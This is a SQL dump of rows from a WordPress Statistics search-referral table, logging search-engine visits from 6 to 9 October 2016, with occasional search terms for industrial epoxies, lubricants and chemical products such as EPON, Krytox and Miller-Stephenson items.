INSERT INTO `wp_statistics_search` VALUES (409, '2016-10-06', 'google', 'www.google.com', '', 1079); 
INSERT INTO `wp_statistics_search` VALUES (410, '2016-10-06', 'bing', 'www.bing.com', 'epon 828', 1082); 
INSERT INTO `wp_statistics_search` VALUES (411, '2016-10-07', 'google', 'www.google.com', '', 1087); 
INSERT INTO `wp_statistics_search` VALUES (412, '2016-10-07', 'google', 'www.google.com', '', 1100); 
INSERT INTO `wp_statistics_search` VALUES (413, '2016-10-07', 'google', 'www.google.co.kr', '', 1101); 
INSERT INTO `wp_statistics_search` VALUES (414, '2016-10-07', 'google', 'www.google.co.jp', '', 1102); 
INSERT INTO `wp_statistics_search` VALUES (415, '2016-10-07', 'google', 'www.google.com', '', 1103); 
INSERT INTO `wp_statistics_search` VALUES (416, '2016-10-07', 'google', 'www.google.ca', '', 1104); 
INSERT INTO `wp_statistics_search` VALUES (417, '2016-10-07', 'google', 'www.google.com', '', 1109); 
INSERT INTO `wp_statistics_search` VALUES (418, '2016-10-07', 'google', 'www.google.com', '', 1110); 
INSERT INTO `wp_statistics_search` VALUES (419, '2016-10-07', 'bing', 'www.bing.com', 'Vazo 67 ', 1111); 
INSERT INTO `wp_statistics_search` VALUES (420, '2016-10-07', 'google', 'www.google.com.sg', '', 1116); 
INSERT INTO `wp_statistics_search` VALUES (421, '2016-10-07', 'google', 'www.google.com', '', 1117); 
INSERT INTO `wp_statistics_search` VALUES (422, '2016-10-07', 'google', 'www.google.com', 'krytox', 1119); 
INSERT INTO `wp_statistics_search` VALUES (423, '2016-10-07', 'google', 'www.google.com', '', 1120); 
INSERT INTO `wp_statistics_search` VALUES (424, '2016-10-07', 'google', 'www.google.com', '', 1125); 
INSERT INTO `wp_statistics_search` VALUES (425, '2016-10-07', 'google', 'com.google.android.googlequicksearchbox', '', 1129); 
INSERT INTO `wp_statistics_search` VALUES (426, '2016-10-07', 'google', 'www.google.ca', '', 1136); 
INSERT INTO `wp_statistics_search` VALUES (427, '2016-10-07', 'google', 'www.google.com.tw', '', 1137); 
INSERT INTO `wp_statistics_search` VALUES (428, '2016-10-07', 'google', 'www.google.com', '', 1138); 
INSERT INTO `wp_statistics_search` VALUES (429, '2016-10-07', 'google', 'www.google.com', '', 1141); 
INSERT INTO `wp_statistics_search` VALUES (430, '2016-10-07', 'google', 'www.google.com.tw', '', 1148); 
INSERT INTO `wp_statistics_search` VALUES (431, '2016-10-07', 'google', 'www.google.co.il', '', 1153); 
INSERT INTO `wp_statistics_search` VALUES (432, '2016-10-07', 'google', 'www.google.co.kr', '', 1154); 
INSERT INTO `wp_statistics_search` VALUES (433, '2016-10-07', 'google', 'www.google.com', '', 1155); 
INSERT INTO `wp_statistics_search` VALUES (434, '2016-10-07', 'google', 'www.google.com', '', 1159); 
INSERT INTO `wp_statistics_search` VALUES (435, '2016-10-07', 'google', 'www.google.com.tw', '', 1165); 
INSERT INTO `wp_statistics_search` VALUES (436, '2016-10-07', 'google', 'www.google.com', '', 1169); 
INSERT INTO `wp_statistics_search` VALUES (437, '2016-10-07', 'google', 'www.google.com', '', 1171); 
INSERT INTO `wp_statistics_search` VALUES (438, '2016-10-07', 'google', 'www.google.it', '', 1172); 
INSERT INTO `wp_statistics_search` VALUES (439, '2016-10-07', 'google', 'www.google.de', '', 1180); 
INSERT INTO `wp_statistics_search` VALUES (440, '2016-10-07', 'google', 'www.google.co.uk', '', 1181); 
INSERT INTO `wp_statistics_search` VALUES (441, '2016-10-07', 'google', 'www.google.co.th', '', 1182); 
INSERT INTO `wp_statistics_search` VALUES (442, '2016-10-07', 'google', 'www.google.de', '', 1187); 
INSERT INTO `wp_statistics_search` VALUES (443, '2016-10-07', 'google', 'www.google.pt', '', 1189); 
INSERT INTO `wp_statistics_search` VALUES (444, '2016-10-07', 'yandex', 'yandex.ru', '', 1190); 
INSERT INTO `wp_statistics_search` VALUES (445, '2016-10-07', 'google', 'www.google.co.th', '', 1191); 
INSERT INTO `wp_statistics_search` VALUES (446, '2016-10-07', 'google', 'www.google.com', '', 1192); 
INSERT INTO `wp_statistics_search` VALUES (447, '2016-10-07', 'google', 'www.google.co.kr', '', 1195); 
INSERT INTO `wp_statistics_search` VALUES (448, '2016-10-07', 'google', 'www.google.es', '', 1203); 
INSERT INTO `wp_statistics_search` VALUES (449, '2016-10-07', 'google', 'www.google.com', '', 1205); 
INSERT INTO `wp_statistics_search` VALUES (450, '2016-10-07', 'google', 'www.google.com.tr', '', 1206); 
INSERT INTO `wp_statistics_search` VALUES (451, '2016-10-07', 'google', 'www.google.com', '', 1209); 
INSERT INTO `wp_statistics_search` VALUES (452, '2016-10-07', 'google', 'www.google.com', '', 1212); 
INSERT INTO `wp_statistics_search` VALUES (453, '2016-10-07', 'google', 'www.google.com', '', 1216); 
INSERT INTO `wp_statistics_search` VALUES (454, '2016-10-07', 'google', 'www.google.co.uk', '', 1219); 
INSERT INTO `wp_statistics_search` VALUES (455, '2016-10-07', 'google', 'www.google.com', '', 1220); 
INSERT INTO `wp_statistics_search` VALUES (456, '2016-10-07', 'google', 'www.google.ro', '', 1221); 
INSERT INTO `wp_statistics_search` VALUES (457, '2016-10-07', 'google', 'www.google.fr', '', 1226); 
INSERT INTO `wp_statistics_search` VALUES (458, '2016-10-07', 'google', 'www.google.com', '', 1227); 
INSERT INTO `wp_statistics_search` VALUES (459, '2016-10-07', 'google', 'www.google.de', '', 1231); 
INSERT INTO `wp_statistics_search` VALUES (460, '2016-10-07', 'google', 'www.google.com', '', 1238); 
INSERT INTO `wp_statistics_search` VALUES (461, '2016-10-07', 'google', 'www.google.com', '', 1239); 
INSERT INTO `wp_statistics_search` VALUES (462, '2016-10-07', 'google', 'www.google.com.ar', '', 1241); 
INSERT INTO `wp_statistics_search` VALUES (463, '2016-10-07', 'google', 'www.google.co.uk', '', 1243); 
INSERT INTO `wp_statistics_search` VALUES (464, '2016-10-07', 'google', 'www.google.co.za', '', 1244); 
INSERT INTO `wp_statistics_search` VALUES (465, '2016-10-07', 'google', 'www.google.com', '', 1246); 
INSERT INTO `wp_statistics_search` VALUES (466, '2016-10-07', 'google', 'www.google.com', '', 1247); 
INSERT INTO `wp_statistics_search` VALUES (467, '2016-10-07', 'google', 'www.google.com', '', 1248); 
INSERT INTO `wp_statistics_search` VALUES (468, '2016-10-07', 'google', 'www.google.co.uk', '', 1250); 
INSERT INTO `wp_statistics_search` VALUES (469, '2016-10-07', 'google', 'www.google.com', '', 1251); 
INSERT INTO `wp_statistics_search` VALUES (470, '2016-10-07', 'google', 'www.google.co.uk', '', 1253); 
INSERT INTO `wp_statistics_search` VALUES (471, '2016-10-07', 'google', 'www.google.com', '', 1257); 
INSERT INTO `wp_statistics_search` VALUES (472, '2016-10-07', 'google', 'www.google.com', '', 1259); 
INSERT INTO `wp_statistics_search` VALUES (473, '2016-10-07', 'bing', 'www.bing.com', 'KRYTOX GPL 225', 1260); 
INSERT INTO `wp_statistics_search` VALUES (474, '2016-10-07', 'google', 'www.google.com', '', 1264); 
INSERT INTO `wp_statistics_search` VALUES (475, '2016-10-07', 'google', 'www.google.com', '', 1266); 
INSERT INTO `wp_statistics_search` VALUES (476, '2016-10-07', 'google', 'www.google.pt', '', 1269); 
INSERT INTO `wp_statistics_search` VALUES (477, '2016-10-07', 'google', 'www.google.pt', '', 1270); 
INSERT INTO `wp_statistics_search` VALUES (478, '2016-10-07', 'google', 'www.google.com', '', 1272); 
INSERT INTO `wp_statistics_search` VALUES (479, '2016-10-07', 'duckduckgo', 'duckduckgo.com', '', 1274); 
INSERT INTO `wp_statistics_search` VALUES (480, '2016-10-07', 'google', 'www.google.com', '', 1275); 
INSERT INTO `wp_statistics_search` VALUES (481, '2016-10-07', 'google', 'www.google.com', '', 1279); 
INSERT INTO `wp_statistics_search` VALUES (482, '2016-10-07', 'google', 'com.google.android.googlequicksearchbox', '', 1282); 
INSERT INTO `wp_statistics_search` VALUES (483, '2016-10-07', 'google', 'www.google.com', '', 1286); 
INSERT INTO `wp_statistics_search` VALUES (484, '2016-10-07', 'google', 'www.google.com', '', 1288); 
INSERT INTO `wp_statistics_search` VALUES (485, '2016-10-07', 'google', 'www.google.ca', '', 1289); 
INSERT INTO `wp_statistics_search` VALUES (486, '2016-10-07', 'google', 'www.google.com', '', 1290); 
INSERT INTO `wp_statistics_search` VALUES (487, '2016-10-07', 'google', 'www.google.com', '', 1292); 
INSERT INTO `wp_statistics_search` VALUES (488, '2016-10-07', 'google', 'www.google.ch', '', 1293); 
INSERT INTO `wp_statistics_search` VALUES (489, '2016-10-07', 'google', 'www.google.com', '', 1296); 
INSERT INTO `wp_statistics_search` VALUES (490, '2016-10-07', 'google', 'www.google.com', '', 1302); 
INSERT INTO `wp_statistics_search` VALUES (491, '2016-10-07', 'google', 'www.google.com', '', 1303); 
INSERT INTO `wp_statistics_search` VALUES (492, '2016-10-07', 'google', 'www.google.ca', '', 1304); 
INSERT INTO `wp_statistics_search` VALUES (493, '2016-10-07', 'google', 'www.google.com', '', 1307); 
INSERT INTO `wp_statistics_search` VALUES (494, '2016-10-07', 'google', 'www.google.com', '', 1311); 
INSERT INTO `wp_statistics_search` VALUES (495, '2016-10-07', 'google', 'www.google.de', '', 1314); 
INSERT INTO `wp_statistics_search` VALUES (496, '2016-10-07', 'bing', 'www.bing.com', 'steven and son  chemical company ', 1317); 
INSERT INTO `wp_statistics_search` VALUES (497, '2016-10-07', 'google', 'www.google.co.uk', '', 1320); 
INSERT INTO `wp_statistics_search` VALUES (498, '2016-10-07', 'google', 'www.google.com', '', 1326); 
INSERT INTO `wp_statistics_search` VALUES (499, '2016-10-07', 'google', 'www.google.com', '', 1327); 
INSERT INTO `wp_statistics_search` VALUES (500, '2016-10-07', 'google', 'www.google.com', '', 1336); 
INSERT INTO `wp_statistics_search` VALUES (501, '2016-10-07', 'google', 'www.google.com', '', 1343); 
INSERT INTO `wp_statistics_search` VALUES (502, '2016-10-07', 'google', 'www.google.com', '', 1344); 
INSERT INTO `wp_statistics_search` VALUES (503, '2016-10-07', 'google', 'www.google.ca', '', 1346); 
INSERT INTO `wp_statistics_search` VALUES (504, '2016-10-07', 'bing', 'www.bing.com', 'epon 815', 1347); 
INSERT INTO `wp_statistics_search` VALUES (505, '2016-10-07', 'google', 'www.google.co.uk', '', 1348); 
INSERT INTO `wp_statistics_search` VALUES (506, '2016-10-07', 'google', 'www.google.ch', '', 1350); 
INSERT INTO `wp_statistics_search` VALUES (507, '2016-10-07', 'google', 'www.google.com', '', 1351); 
INSERT INTO `wp_statistics_search` VALUES (508, '2016-10-07', 'google', 'www.google.com', '', 1352); 
INSERT INTO `wp_statistics_search` VALUES (509, '2016-10-07', 'duckduckgo', 'duckduckgo.com', '', 1353); 
INSERT INTO `wp_statistics_search` VALUES (510, '2016-10-07', 'google', 'www.google.com.bz', '', 1354); 
INSERT INTO `wp_statistics_search` VALUES (511, '2016-10-07', 'google', 'www.google.com', '', 1356); 
INSERT INTO `wp_statistics_search` VALUES (512, '2016-10-07', 'google', 'www.google.com', '', 1357); 
INSERT INTO `wp_statistics_search` VALUES (513, '2016-10-07', 'google', 'www.google.com', '', 1362); 
INSERT INTO `wp_statistics_search` VALUES (514, '2016-10-07', 'google', 'www.google.com', '', 1366); 
INSERT INTO `wp_statistics_search` VALUES (515, '2016-10-07', 'google', 'www.google.com', '', 1369); 
INSERT INTO `wp_statistics_search` VALUES (516, '2016-10-07', 'google', 'www.google.ca', '', 1373); 
INSERT INTO `wp_statistics_search` VALUES (517, '2016-10-07', 'google', 'www.google.com', '', 1374); 
INSERT INTO `wp_statistics_search` VALUES (518, '2016-10-07', 'google', 'www.google.com', '', 1375); 
INSERT INTO `wp_statistics_search` VALUES (519, '2016-10-07', 'bing', 'www.bing.com', 'miller stephenson chemical msds', 1376); 
INSERT INTO `wp_statistics_search` VALUES (520, '2016-10-07', 'google', 'www.google.com', '', 1386); 
INSERT INTO `wp_statistics_search` VALUES (521, '2016-10-07', 'bing', 'www.bing.com', 'vazo 64', 1392); 
INSERT INTO `wp_statistics_search` VALUES (522, '2016-10-07', 'google', 'www.google.com', '', 1396); 
INSERT INTO `wp_statistics_search` VALUES (523, '2016-10-07', 'google', 'www.google.com', '', 1397); 
INSERT INTO `wp_statistics_search` VALUES (524, '2016-10-07', 'google', 'www.google.lv', '', 1398); 
INSERT INTO `wp_statistics_search` VALUES (525, '2016-10-07', 'google', 'www.google.com', '', 1404); 
INSERT INTO `wp_statistics_search` VALUES (526, '2016-10-07', 'google', 'www.google.com', '', 1405); 
INSERT INTO `wp_statistics_search` VALUES (527, '2016-10-07', 'bing', 'www.bing.com', '', 1410); 
INSERT INTO `wp_statistics_search` VALUES (528, '2016-10-07', 'google', 'www.google.com', '', 1411); 
INSERT INTO `wp_statistics_search` VALUES (529, '2016-10-07', 'google', 'www.google.com', '', 1415); 
INSERT INTO `wp_statistics_search` VALUES (530, '2016-10-07', 'yandex', 'yandex.ru', '', 1417); 
INSERT INTO `wp_statistics_search` VALUES (531, '2016-10-07', 'bing', 'www.bing.com', '', 1418); 
INSERT INTO `wp_statistics_search` VALUES (532, '2016-10-07', 'google', 'www.google.com', '', 1420); 
INSERT INTO `wp_statistics_search` VALUES (533, '2016-10-07', 'google', 'www.google.ca', '', 1422); 
INSERT INTO `wp_statistics_search` VALUES (534, '2016-10-07', 'google', 'www.google.com', '', 1424); 
INSERT INTO `wp_statistics_search` VALUES (535, '2016-10-07', 'google', 'www.google.com', '', 1425); 
INSERT INTO `wp_statistics_search` VALUES (536, '2016-10-07', 'bing', 'www.bing.com', 'miller-stephenson chemical co', 1426); 
INSERT INTO `wp_statistics_search` VALUES (537, '2016-10-07', 'google', 'www.google.com', '', 1427); 
INSERT INTO `wp_statistics_search` VALUES (538, '2016-10-07', 'google', 'com.google.android.googlequicksearchbox', '', 1428); 
INSERT INTO `wp_statistics_search` VALUES (539, '2016-10-07', 'google', 'www.google.ca', '', 1429); 
INSERT INTO `wp_statistics_search` VALUES (540, '2016-10-07', 'google', 'www.google.com', '', 1430); 
INSERT INTO `wp_statistics_search` VALUES (541, '2016-10-07', 'google', 'www.google.com', '', 1431); 
INSERT INTO `wp_statistics_search` VALUES (542, '2016-10-07', 'yahoo', 'search.yahoo.com', '', 1438); 
INSERT INTO `wp_statistics_search` VALUES (543, '2016-10-07', 'google', 'www.google.ca', '', 1439); 
INSERT INTO `wp_statistics_search` VALUES (544, '2016-10-07', 'google', 'www.google.com', '', 1441); 
INSERT INTO `wp_statistics_search` VALUES (545, '2016-10-07', 'google', 'www.google.com', '', 1443); 
INSERT INTO `wp_statistics_search` VALUES (546, '2016-10-07', 'google', 'www.google.co.id', '', 1445); 
INSERT INTO `wp_statistics_search` VALUES (547, '2016-10-07', 'bing', 'www.bing.com', 'ms-122ad sds', 1446); 
INSERT INTO `wp_statistics_search` VALUES (548, '2016-10-07', 'google', 'www.google.com', '', 1448); 
INSERT INTO `wp_statistics_search` VALUES (549, '2016-10-07', 'google', 'www.google.com', '', 1449); 
INSERT INTO `wp_statistics_search` VALUES (550, '2016-10-07', 'google', 'www.google.com', '', 1467); 
INSERT INTO `wp_statistics_search` VALUES (551, '2016-10-07', 'google', 'www.google.com', '', 1468); 
INSERT INTO `wp_statistics_search` VALUES (552, '2016-10-07', 'google', 'www.google.com', '', 1469); 
INSERT INTO `wp_statistics_search` VALUES (553, '2016-10-07', 'google', 'www.google.co.uk', '', 1471); 
INSERT INTO `wp_statistics_search` VALUES (554, '2016-10-07', 'google', 'www.google.com', '', 1472); 
INSERT INTO `wp_statistics_search` VALUES (555, '2016-10-07', 'google', 'www.google.com', '', 1474); 
INSERT INTO `wp_statistics_search` VALUES (556, '2016-10-07', 'google', 'www.google.com', '', 1476); 
INSERT INTO `wp_statistics_search` VALUES (557, '2016-10-07', 'google', 'www.google.com', '', 1477); 
INSERT INTO `wp_statistics_search` VALUES (558, '2016-10-07', 'bing', 'www.bing.com', 'miller stephenson', 1478); 
INSERT INTO `wp_statistics_search` VALUES (559, '2016-10-07', 'google', 'www.google.com', '', 1479); 
INSERT INTO `wp_statistics_search` VALUES (560, '2016-10-07', 'google', 'www.google.com', '', 1485); 
INSERT INTO `wp_statistics_search` VALUES (561, '2016-10-07', 'google', 'www.google.com', '', 1486); 
INSERT INTO `wp_statistics_search` VALUES (562, '2016-10-07', 'google', 'www.google.com', '', 1487); 
INSERT INTO `wp_statistics_search` VALUES (563, '2016-10-07', 'google', 'www.google.com', '', 1488); 
INSERT INTO `wp_statistics_search` VALUES (564, '2016-10-07', 'google', 'www.google.com', '', 1490); 
INSERT INTO `wp_statistics_search` VALUES (565, '2016-10-07', 'google', 'www.google.com', '', 1492); 
INSERT INTO `wp_statistics_search` VALUES (566, '2016-10-07', 'google', 'www.google.co.il', '', 1494); 
INSERT INTO `wp_statistics_search` VALUES (567, '2016-10-07', 'google', 'www.google.ca', '', 1495); 
INSERT INTO `wp_statistics_search` VALUES (568, '2016-10-07', 'google', 'www.google.com', '', 1496); 
INSERT INTO `wp_statistics_search` VALUES (569, '2016-10-07', 'bing', 'www.bing.com', 'epikure curing agent w sds', 1505); 
INSERT INTO `wp_statistics_search` VALUES (570, '2016-10-07', 'google', 'www.google.com', '', 1507); 
INSERT INTO `wp_statistics_search` VALUES (571, '2016-10-07', 'google', 'www.google.com', '', 1508); 
INSERT INTO `wp_statistics_search` VALUES (572, '2016-10-07', 'google', 'www.google.co.uk', '', 1514); 
INSERT INTO `wp_statistics_search` VALUES (573, '2016-10-07', 'google', 'www.google.co.uk', '', 1516); 
INSERT INTO `wp_statistics_search` VALUES (574, '2016-10-07', 'google', 'www.google.com', '', 1517); 
INSERT INTO `wp_statistics_search` VALUES (575, '2016-10-07', 'google', 'www.google.com.bo', '', 1519); 
INSERT INTO `wp_statistics_search` VALUES (576, '2016-10-07', 'google', 'www.google.ca', '', 1522); 
INSERT INTO `wp_statistics_search` VALUES (577, '2016-10-08', 'google', 'www.google.com', '', 1528); 
INSERT INTO `wp_statistics_search` VALUES (578, '2016-10-08', 'bing', 'www.bing.com', 'EPIKURE 3223 SDS', 1529); 
INSERT INTO `wp_statistics_search` VALUES (579, '2016-10-08', 'google', 'www.google.com', '', 1531); 
INSERT INTO `wp_statistics_search` VALUES (580, '2016-10-08', 'google', 'www.google.com', '', 1532); 
INSERT INTO `wp_statistics_search` VALUES (581, '2016-10-08', 'google', 'www.google.co.jp', '', 1533); 
INSERT INTO `wp_statistics_search` VALUES (582, '2016-10-08', 'google', 'www.google.com', '', 1534); 
INSERT INTO `wp_statistics_search` VALUES (583, '2016-10-08', 'google', 'www.google.com', '', 1542); 
INSERT INTO `wp_statistics_search` VALUES (584, '2016-10-08', 'google', 'www.google.com', 'stephenson chemical company insect killer EPA Est.4887-SA-1', 1545); 
INSERT INTO `wp_statistics_search` VALUES (585, '2016-10-08', 'google', 'www.google.com', '', 1546); 
INSERT INTO `wp_statistics_search` VALUES (586, '2016-10-08', 'google', 'www.google.com', '', 1564); 
INSERT INTO `wp_statistics_search` VALUES (587, '2016-10-08', 'google', 'www.google.com', '', 1566); 
INSERT INTO `wp_statistics_search` VALUES (588, '2016-10-08', 'google', 'www.google.com', '', 1572); 
INSERT INTO `wp_statistics_search` VALUES (589, '2016-10-08', 'google', 'www.google.com', '', 1577); 
INSERT INTO `wp_statistics_search` VALUES (590, '2016-10-08', 'bing', 'www.bing.com', 'epon 828', 1579); 
INSERT INTO `wp_statistics_search` VALUES (591, '2016-10-08', 'google', 'www.google.ca', '', 1586); 
INSERT INTO `wp_statistics_search` VALUES (592, '2016-10-08', 'google', 'www.google.com.au', '', 1596); 
INSERT INTO `wp_statistics_search` VALUES (593, '2016-10-08', 'google', 'www.google.dk', '', 1648); 
INSERT INTO `wp_statistics_search` VALUES (594, '2016-10-08', 'baidu', 'transcoder.baidu.com', '', 1649); 
INSERT INTO `wp_statistics_search` VALUES (595, '2016-10-08', 'google', 'www.google.co.in', '', 1652); 
INSERT INTO `wp_statistics_search` VALUES (596, '2016-10-08', 'google', 'www.google.com.hk', '', 1679); 
INSERT INTO `wp_statistics_search` VALUES (597, '2016-10-08', 'google', 'www.google.com', '', 1682); 
INSERT INTO `wp_statistics_search` VALUES (598, '2016-10-08', 'google', 'www.google.com', '', 1698); 
INSERT INTO `wp_statistics_search` VALUES (599, '2016-10-08', 'google', 'www.google.ca', '', 1700); 
INSERT INTO `wp_statistics_search` VALUES (600, '2016-10-08', 'google', 'www.google.com', '', 1717); 
INSERT INTO `wp_statistics_search` VALUES (601, '2016-10-08', 'google', 'www.google.com', '', 1720); 
INSERT INTO `wp_statistics_search` VALUES (602, '2016-10-08', 'bing', 'cn.bing.com', 'miller stephenson company', 1721); 
INSERT INTO `wp_statistics_search` VALUES (603, '2016-10-08', 'google', 'www.google.com', '', 1725); 
INSERT INTO `wp_statistics_search` VALUES (604, '2016-10-08', 'google', 'www.google.com.tr', '', 1728); 
INSERT INTO `wp_statistics_search` VALUES (605, '2016-10-08', 'google', 'www.google.com.co', '', 1741); 
INSERT INTO `wp_statistics_search` VALUES (606, '2016-10-08', 'google', 'www.google.com', '', 1742); 
INSERT INTO `wp_statistics_search` VALUES (607, '2016-10-08', 'bing', 'www.bing.com', '', 1746); 
INSERT INTO `wp_statistics_search` VALUES (608, '2016-10-08', 'google', 'www.google.com', '', 1752); 
INSERT INTO `wp_statistics_search` VALUES (609, '2016-10-08', 'google', 'www.google.com', '', 1754); 
INSERT INTO `wp_statistics_search` VALUES (610, '2016-10-08', 'google', 'www.google.com', '', 1760); 
INSERT INTO `wp_statistics_search` VALUES (611, '2016-10-08', 'google', 'www.google.com', '', 1761); 
INSERT INTO `wp_statistics_search` VALUES (612, '2016-10-08', 'google', 'www.google.com', '', 1762); 
INSERT INTO `wp_statistics_search` VALUES (613, '2016-10-08', 'google', 'www.google.co.uk', '', 1772); 
INSERT INTO `wp_statistics_search` VALUES (614, '2016-10-08', 'google', 'www.google.com', '', 1773); 
INSERT INTO `wp_statistics_search` VALUES (615, '2016-10-08', 'google', 'www.google.com', '', 1774); 
INSERT INTO `wp_statistics_search` VALUES (616, '2016-10-08', 'google', 'www.google.com', '', 1777); 
INSERT INTO `wp_statistics_search` VALUES (617, '2016-10-08', 'google', 'www.google.com', 'utility chemicals bearing assembly lubricant 1 quart 35-1040', 1782); 
INSERT INTO `wp_statistics_search` VALUES (618, '2016-10-08', 'google', 'www.google.com', '', 1783); 
INSERT INTO `wp_statistics_search` VALUES (619, '2016-10-08', 'google', 'www.google.com', '', 1784); 
INSERT INTO `wp_statistics_search` VALUES (620, '2016-10-08', 'yahoo', 'r.search.yahoo.com', '', 1789); 
INSERT INTO `wp_statistics_search` VALUES (621, '2016-10-08', 'google', 'www.google.com', '', 1805); 
INSERT INTO `wp_statistics_search` VALUES (622, '2016-10-08', 'google', 'www.google.co.uk', '', 1821); 
INSERT INTO `wp_statistics_search` VALUES (623, '2016-10-08', 'google', 'www.google.ca', '', 1823); 
INSERT INTO `wp_statistics_search` VALUES (624, '2016-10-08', 'google', 'www.google.com', '', 1824); 
INSERT INTO `wp_statistics_search` VALUES (625, '2016-10-08', 'google', 'www.google.com', '', 1827); 
INSERT INTO `wp_statistics_search` VALUES (626, '2016-10-08', 'google', 'www.google.com', '', 1834); 
INSERT INTO `wp_statistics_search` VALUES (627, '2016-10-08', 'google', 'www.google.com', '', 1835); 
INSERT INTO `wp_statistics_search` VALUES (628, '2016-10-08', 'google', 'www.google.com', '', 1836); 
INSERT INTO `wp_statistics_search` VALUES (629, '2016-10-08', 'google', 'www.google.com', '', 1837); 
INSERT INTO `wp_statistics_search` VALUES (630, '2016-10-08', 'bing', 'www.bing.com', ' Miller Stephenson MS 122AV release coating:', 1843); 
INSERT INTO `wp_statistics_search` VALUES (631, '2016-10-08', 'google', 'www.google.com', '', 1846); 
INSERT INTO `wp_statistics_search` VALUES (632, '2016-10-08', 'bing', 'www.bing.com', 'epon 830', 1849); 
INSERT INTO `wp_statistics_search` VALUES (633, '2016-10-08', 'google', 'www.google.com', '', 1851); 
INSERT INTO `wp_statistics_search` VALUES (634, '2016-10-08', 'google', 'www.google.com', '', 1853); 
INSERT INTO `wp_statistics_search` VALUES (635, '2016-10-08', 'google', 'www.google.com', '', 1854); 
INSERT INTO `wp_statistics_search` VALUES (636, '2016-10-08', 'google', 'www.google.co.uk', '', 1855); 
INSERT INTO `wp_statistics_search` VALUES (637, '2016-10-08', 'google', 'www.google.ca', '', 1865); 
INSERT INTO `wp_statistics_search` VALUES (638, '2016-10-08', 'google', 'www.google.com', '', 1867); 
INSERT INTO `wp_statistics_search` VALUES (639, '2016-10-08', 'google', 'www.google.com', '', 1868); 
INSERT INTO `wp_statistics_search` VALUES (640, '2016-10-08', 'yahoo', 'r.search.yahoo.com', '', 1869); 
INSERT INTO `wp_statistics_search` VALUES (641, '2016-10-08', 'google', 'www.google.com', 'good strucual epoxy adhesive', 1870); 
INSERT INTO `wp_statistics_search` VALUES (642, '2016-10-09', 'google', 'www.google.com', '', 1879); 
INSERT INTO `wp_statistics_search` VALUES (643, '2016-10-09', 'google', 'www.google.com', '', 1885); 
INSERT INTO `wp_statistics_search` VALUES (644, '2016-10-09', 'google', 'www.google.com', '', 1886); 
INSERT INTO `wp_statistics_search` VALUES (645, '2016-10-09', 'google', 'www.google.com', '', 1887); 
INSERT INTO `wp_statistics_search` VALUES (646, '2016-10-09', 'google', 'www.google.com', '', 1894); 
INSERT INTO `wp_statistics_search` VALUES (647, '2016-10-09', 'google', 'www.google.com', '', 1899); 
INSERT INTO `wp_statistics_search` VALUES (648, '2016-10-09', 'bing', 'www.bing.com', 'amazon', 1906); 
INSERT INTO `wp_statistics_search` VALUES (649, '2016-10-09', 'google', 'www.google.com', '', 1921); 
INSERT INTO `wp_statistics_search` VALUES (650, '2016-10-09', 'bing', 'www.bing.com', '', 1923); 
INSERT INTO `wp_statistics_search` VALUES (651, '2016-10-09', 'google', 'www.google.com', '', 1925); 
INSERT INTO `wp_statistics_search` VALUES (652, '2016-10-09', 'google', 'www.google.ca', '', 1928); 
INSERT INTO `wp_statistics_search` VALUES (653, '2016-10-09', 'google', 'www.google.com', '', 1929); 
INSERT INTO `wp_statistics_search` VALUES (654, '2016-10-09', 'google', 'www.google.com', '', 1930); 
INSERT INTO `wp_statistics_search` VALUES (655, '2016-10-09', 'google', 'www.google.com', '', 1933); 
INSERT INTO `wp_statistics_search` VALUES (656, '2016-10-09', 'google', 'www.google.com', '', 1938); 
INSERT INTO `wp_statistics_search` VALUES (657, '2016-10-09', 'google', 'www.google.co.uk', '', 1940); 
INSERT INTO `wp_statistics_search` VALUES (658, '2016-10-09', 'google', 'www.google.com.tw', '', 1948); 
INSERT INTO `wp_statistics_search` VALUES (659, '2016-10-09', 'baidu', 'www.baidu.com', '', 1949); 
INSERT INTO `wp_statistics_search` VALUES (660, '2016-10-09', 'google', 'www.google.com', '', 1950); 
INSERT INTO `wp_statistics_search` VALUES (661, '2016-10-09', 'google', 'www.google.com', '', 1961); 
INSERT INTO `wp_statistics_search` VALUES (662, '2016-10-09', 'google', 'www.google.com', '', 1963); 
INSERT INTO `wp_statistics_search` VALUES (663, '2016-10-09', 'google', 'www.google.com.sg', '', 1975); 
INSERT INTO `wp_statistics_search` VALUES (664, '2016-10-09', 'google', 'www.google.ro', '', 1984); 
INSERT INTO `wp_statistics_search` VALUES (665, '2016-10-09', 'yandex', 'yandex.ru', '', 1985); 
INSERT INTO `wp_statistics_search` VALUES (666, '2016-10-09', 'google', 'www.google.com', '', 1989); 
INSERT INTO `wp_statistics_search` VALUES (667, '2016-10-09', 'google', 'www.google.com', '', 1992); 
INSERT INTO `wp_statistics_search` VALUES (668, '2016-10-09', 'yandex', 'yandex.ru', '', 1994); 
INSERT INTO `wp_statistics_search` VALUES (669, '2016-10-09', 'google', 'www.google.com', 'Electrical Connector Lubricant', 1995); 
INSERT INTO `wp_statistics_search` VALUES (670, '2016-10-09', 'google', 'www.google.com', '', 1999); 
INSERT INTO `wp_statistics_search` VALUES (671, '2016-10-09', 'google', 'www.google.com', '', 2002); 
INSERT INTO `wp_statistics_search` VALUES (672, '2016-10-09', 'yandex', 'yandex.ru', '', 2006); 
INSERT INTO `wp_statistics_search` VALUES (673, '2016-10-09', 'google', 'www.google.com', '', 2009); 
INSERT INTO `wp_statistics_search` VALUES (674, '2016-10-09', 'google', 'www.google.com', '', 2011); 
INSERT INTO `wp_statistics_search` VALUES (675, '2016-10-09', 'google', 'www.google.co.kr', '', 2012); 
INSERT INTO `wp_statistics_search` VALUES (676, '2016-10-09', 'google', 'www.google.com', '', 2016); 
INSERT INTO `wp_statistics_search` VALUES (677, '2016-10-09', 'google', 'www.google.fr', '', 2018); 
INSERT INTO `wp_statistics_search` VALUES (678, '2016-10-09', 'google', 'www.google.com', '', 2027); 
INSERT INTO `wp_statistics_search` VALUES (679, '2016-10-09', 'google', 'www.google.com', '', 2036); 
INSERT INTO `wp_statistics_search` VALUES (680, '2016-10-09', 'google', 'www.google.com', '', 2049); 
INSERT INTO `wp_statistics_search` VALUES (681, '2016-10-09', 'google', 'www.google.com', '', 2051); 
INSERT INTO `wp_statistics_search` VALUES (682, '2016-10-09', 'google', 'www.google.com.pk', '', 2063); 
INSERT INTO `wp_statistics_search` VALUES (683, '2016-10-09', 'google', 'www.google.com', '', 2068); 
INSERT INTO `wp_statistics_search` VALUES (684, '2016-10-09', 'google', 'www.google.gr', '', 2071); 
INSERT INTO `wp_statistics_search` VALUES (685, '2016-10-09', 'google', 'www.google.com', '', 2072); 
INSERT INTO `wp_statistics_search` VALUES (686, '2016-10-09', 'google', 'www.google.de', '', 2073); 
